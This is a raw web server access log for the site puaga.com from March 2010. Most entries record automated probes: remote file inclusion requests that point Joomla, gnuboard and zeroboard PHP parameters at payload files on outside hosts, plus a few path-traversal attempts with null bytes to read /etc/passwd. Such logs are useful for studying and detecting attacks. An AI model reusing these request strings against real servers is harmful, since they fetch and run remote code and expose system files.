200.93.147.154 - - [03/Mar/2010:10:38:40 -0800] "GET /logs/access_100201.log%20%20//components/com_forum/download.php?phpbb_root_path=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:10:39:02 -0800] "GET /logs/access_100201.log%20%20//components/com_forum/download.php?phpbb_root_path=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:10:39:05 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:10:39:11 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:10:39:36 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:10:39:36 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:10:39:36 -0800] "GET /logs/access_100201.log%20%20//components/com_forum/download.php?phpbb_root_path=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:10:39:38 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:10:39:39 -0800] "GET /logs/access_100201.log%20%20//components/com_forum/download.php?phpbb_root_path=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:10:39:39 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:10:40:17 -0800] "GET /logs/access_100211.log%20%20//components/com_forum/download.php?phpbb_root_path=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:10:40:37 -0800] "GET /logs/access_100211.log%20%20//components/com_forum/download.php?phpbb_root_path=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:10:40:39 -0800] "GET /logs/access_100211.log%20%20//components/com_forum/download.php?phpbb_root_path=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:10:40:57 -0800] "GET /logs/access_100211.log%20%20//components/com_forum/download.php?phpbb_root_path=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [03/Mar/2010:10:42:06 -0800] "GET /logs/access_100128.log//board/bbs/delete_all.php?board_skin_path=http://solid.go.ro/d1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [03/Mar/2010:10:42:24 -0800] "GET /logs/access_100207.log//board/bbs/delete_all.php?board_skin_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [03/Mar/2010:10:44:30 -0800] "GET /logs/access_100128.log//board/bbs/delete_all.php?board_skin_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [03/Mar/2010:10:45:02 -0800] "GET /logs/access_100207.log//board/bbs/delete_all.php?board_skin_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.90.115.49 - - [03/Mar/2010:10:46:35 -0800] "GET /sources/functions.php?CONFIG[main_path]=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:10:48:40 -0800] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:10:48:47 -0800] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:10:48:47 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:10:48:47 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.90.115.49 - - [03/Mar/2010:10:48:57 -0800] "GET /logs/access_100128.log//board/bbs/delete_all.php?board_skin_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:10:49:17 -0800] "GET /logs/access.log//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:10:49:17 -0800] "GET /logs//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:10:49:17 -0800] "GET /index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:10:49:23 -0800] "GET /logs//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:10:49:23 -0800] "GET /logs/access.log//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:10:49:24 -0800] "GET /index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
93.90.115.49 - - [03/Mar/2010:10:49:30 -0800] "GET /logs/access_100207.log//board/bbs/delete_all.php?board_skin_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.90.115.49 - - [03/Mar/2010:10:50:27 -0800] "GET /sources/functions.php?CONFIG[main_path]=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:10:51:40 -0800] "GET /logs/access_100217.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:10:51:41 -0800] "GET /logs/access_100217.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:10:52:21 -0800] "GET /logs/access.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:10:52:28 -0800] "GET /logs/access.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [03/Mar/2010:10:52:49 -0800] "GET /logs/access_100219.log//bbs///////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [03/Mar/2010:10:52:49 -0800] "GET /logs/access_100213.log//bbs///////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [03/Mar/2010:10:52:49 -0800] "GET /bbs///////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [03/Mar/2010:10:54:33 -0800] "GET /bbs///////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [03/Mar/2010:10:54:33 -0800] "GET /logs//bbs///////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [03/Mar/2010:10:54:34 -0800] "GET /logs/access_100213.log%20%20//bbs///////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [03/Mar/2010:10:54:38 -0800] "GET /logs/access_100221.log%20%20//bbs///////good.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:10:54:39 -0800] "GET /logs/access_100211.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:10:55:03 -0800] "GET /logs/access_100211.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.119.216.146 - - [03/Mar/2010:10:55:22 -0800] "GET /logs/access_100128.log/////write_comment_update.php?board_skin_path=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.119.216.146 - - [03/Mar/2010:10:55:22 -0800] "GET /logs/////write_comment_update.php?board_skin_path=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.119.216.146 - - [03/Mar/2010:10:55:22 -0800] "GET ////write_comment_update.php?board_skin_path=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:10:56:12 -0800] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:10:56:21 -0800] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.119.216.146 - - [03/Mar/2010:10:56:38 -0800] "GET /logs/access_100201.log/////write_comment_update.php?board_skin_path=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [03/Mar/2010:10:57:32 -0800] "GET ////write_comment_update.php?board_skin_path=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [03/Mar/2010:10:57:32 -0800] "GET /logs/access_100128.log/////write_comment_update.php?board_skin_path=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.120 - - [03/Mar/2010:10:57:32 -0800] "GET /logs/////write_comment_update.php?board_skin_path=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.82.39.2 - - [03/Mar/2010:10:57:42 -0800] "GET /logs/access_100218.log/xmlrpc.php? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
74.82.39.2 - - [03/Mar/2010:10:57:42 -0800] "GET /xmlrpc.php? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
74.82.39.2 - - [03/Mar/2010:10:57:43 -0800] "GET /logs/xmlrpc.php? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:10:57:57 -0800] "GET /logs/access_100217.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [03/Mar/2010:10:58:07 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [03/Mar/2010:10:58:07 -0800] "GET /logs/access_100126.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [03/Mar/2010:10:58:07 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [03/Mar/2010:10:58:09 -0800] "GET /logs/access_100126.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [03/Mar/2010:10:58:09 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [03/Mar/2010:10:58:09 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:10:58:12 -0800] "GET /logs/access_100217.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [03/Mar/2010:10:58:12 -0800] "GET /logs/access_100130.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [03/Mar/2010:10:58:13 -0800] "GET /logs/access_100130.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.82.39.2 - - [03/Mar/2010:10:58:32 -0800] "GET /logs/access_100213.log/xmlrpc.php? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
85.233.162.101 - - [03/Mar/2010:10:58:59 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [03/Mar/2010:10:58:59 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [03/Mar/2010:10:58:59 -0800] "GET /logs/access_100130.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [03/Mar/2010:10:58:59 -0800] "GET /logs/access_100126.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [03/Mar/2010:10:59:09 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://zerozon.co.kr/data/eeng/heheh.txt????????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [03/Mar/2010:10:59:31 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [03/Mar/2010:10:59:31 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [03/Mar/2010:10:59:31 -0800] "GET /logs/access_100130.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [03/Mar/2010:10:59:31 -0800] "GET /logs/access_100126.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.90.115.49 - - [03/Mar/2010:11:00:01 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
93.90.115.49 - - [03/Mar/2010:11:00:02 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=./../../../../../../../../etc/passwd HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:11:01:48 -0800] "GET /logs/access_100211.log//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [03/Mar/2010:11:02:03 -0800] "GET /logs/access_100202.log//gnuboard4//bbs/write_update.php?board_skin_path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [03/Mar/2010:11:02:03 -0800] "GET /gnuboard4//bbs/write_update.php?board_skin_path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [03/Mar/2010:11:02:03 -0800] "GET /logs/access_100129.log//gnuboard4//bbs/write_update.php?board_skin_path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [03/Mar/2010:11:02:03 -0800] "GET /logs//gnuboard4//bbs/write_update.php?board_skin_path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:11:02:32 -0800] "GET /logs/access_100211.log//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.37.97 - - [03/Mar/2010:11:02:40 -0800] "GET /login/registerError.php HTTP/1.0" 200 6018 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.97 - - [03/Mar/2010:11:02:41 -0800] "GET /style/PuagaDark.css HTTP/1.0" 200 2588 "http://puaga.com/login/registerError.php" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.97 - - [03/Mar/2010:11:02:41 -0800] "GET /style/pngHack.css HTTP/1.0" 200 42 "http://puaga.com/login/registerError.php" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.97 - - [03/Mar/2010:11:02:41 -0800] "GET /login/dtree.css HTTP/1.0" 404 5258 "http://puaga.com/login/registerError.php" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
77.241.83.107 - - [03/Mar/2010:11:03:23 -0800] "GET /logs/access_100208.log%20%20//help.mgm.php?mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [03/Mar/2010:11:03:23 -0800] "GET /logs/access_100126.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [03/Mar/2010:11:03:23 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:11:03:39 -0800] "GET /logs/access_100219.log%20%20//help.mgm.php?mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:11:03:43 -0800] "GET /help.mgm.php?mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:11:03:43 -0800] "GET /logs//help.mgm.php?mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:11:03:43 -0800] "GET /logs/access_100208.log%20%20//help.mgm.php?mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:11:03:52 -0800] "GET /logs/access_100219.log%20%20//help.mgm.php?mosConfig_absolute_path=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [03/Mar/2010:11:03:58 -0800] "GET /logs/access_100130.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [03/Mar/2010:11:04:04 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [03/Mar/2010:11:04:04 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [03/Mar/2010:11:04:04 -0800] "GET /logs/access_100126.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [03/Mar/2010:11:04:48 -0800] "GET /gnuboard4//bbs/write_update.php?board_skin_path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [03/Mar/2010:11:04:48 -0800] "GET /logs//gnuboard4//bbs/write_update.php?board_skin_path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [03/Mar/2010:11:04:48 -0800] "GET /logs/access_100129.log//gnuboard4//bbs/write_update.php?board_skin_path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [03/Mar/2010:11:04:52 -0800] "GET /logs/access_100202.log//gnuboard4//bbs/write_update.php?board_skin_path=http://sakaeo.nfe.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [03/Mar/2010:11:05:02 -0800] "GET /logs/access_100130.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [03/Mar/2010:11:05:34 -0800] "GET /logs/access_100220.log///appserv/main.php?appserv_root=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [03/Mar/2010:11:05:34 -0800] "GET //appserv/main.php?appserv_root=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [03/Mar/2010:11:05:34 -0800] "GET /logs///appserv/main.php?appserv_root=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [03/Mar/2010:11:05:35 -0800] "GET /logs/access_100201.log///appserv/main.php?appserv_root=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.119.216.146 - - [03/Mar/2010:11:06:23 -0800] "GET /logs/access_100225.log//?_zb_path=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.119.216.146 - - [03/Mar/2010:11:06:23 -0800] "GET /logs//?_zb_path=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
75.119.216.146 - - [03/Mar/2010:11:06:23 -0800] "GET /?_zb_path=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
93.90.115.49 - - [03/Mar/2010:11:06:39 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
110.45.145.178 - - [03/Mar/2010:11:06:52 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
75.119.216.146 - - [03/Mar/2010:11:06:58 -0800] "GET /logs/access_100225.log//?_zb_path=http://canaldoserralheiro.com.br/laknat/cc1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
